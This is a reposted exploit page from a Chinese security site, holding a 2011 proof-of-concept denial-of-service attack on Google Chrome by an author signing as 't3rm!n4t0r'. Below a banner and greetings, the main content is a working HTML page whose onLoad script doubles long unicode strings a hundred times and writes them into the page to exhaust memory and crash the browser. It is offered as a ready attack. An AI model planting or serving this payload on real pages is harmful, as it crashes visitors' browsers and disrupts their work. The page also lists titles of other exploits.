首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Google Chrome Denial Of Service (DoS)
来源:happyterminator@gmail.com 作者:Prashant 发布时间:2011-10-25  

/*

         GGGGGG\                                                  
 GG  __GG\                                                 
 GG /  \__| aaaaaa\   rrrrrr\  aaaaaa\   gggggg\   eeeeee\ 
 GG |GGGG\  \____aa\ rr  __rr\ \____aa\ gg  __gg\ ee  __ee\
 GG |\_GG | aaaaaaa |rr |  \__|aaaaaaa |gg /  gg |eeeeeeee |
 GG |  GG |aa  __aa |rr |     aa  __aa |gg |  gg |ee   ____|
 \GGGGGG  |\aaaaaaa |rr |     \aaaaaaa |\ggggggg |\eeeeeee\
   \______/  \_______|\__|      \_______| \____gg | \_______|
                                               gg\   gg |         
                                         gggggg  |

Info-sec forum: http://garage4hackers.com

[+] Google Chrome Denial Of Service (DoS)

[+] Author: Prashant a.k.a t3rm!n4t0r

[+] C0ntact: happyterminator@gmail.com

[+] Platform: Windows, *nix

[+] Tested on: Windows Server 2003, XP SP2, Ubuntu 10.04

[+] Special Greets to: "vinnu" and secfence team

[+] Greets to: fb1h2s, b0nd, Eby, punter,godwin austin, the_empty, RD(Xer0), warrior, abhaythehero,d3c0d3r

                      all hackers garage crew :)


*/


<html>
<title>DoS</title>
<head>
<script>
function Lox()
 {
 
    var longunistring1 = unescape("%u4141%u4141");
    var longunistring2 = unescape("%u4242%u4242");
    var longunistring3 = unescape("%u4343%u4343");
    var longunistring4 = unescape("%u4444%u4444");
    
    for(i=0; i <= 100 ; ++i)
 {
        longunistring1+=longunistring1;
        longunistring2+=longunistring2;
        longunistring3+=longunistring3;
        longunistring4+=longunistring4;
        document.write(longunistring1);
        document.write(longunistring2);
        document.write(longunistring3);
        document.write(longunistring4);
    }   
    document.write(longunistring1);
    document.write(longunistring2);
    document.write(longunistring3);
    document.write(longunistring4);
}
</script>
</head>
<body onLoad="Lox()">
</body>
</html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS11-077 Win32k Null Pointer D
·Cytel Studio 9.0 (CY3 File) St
·Google Chrome PoC, killing thr
·zFTP Server "cwd/stat" Remote
·Cyclope Internet Filtering Pro
·BlueZone Malformed .zft file L
·HP Power Manager 'formExportDa
·Opera Use After Free - Crash P
·Cyclope Internet Filtering Pro
·Wordpress 2.0.* Denial of Serv
·Opera <= 11.51 Use After Free
·MpcStar Player 4.x Local buffe
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved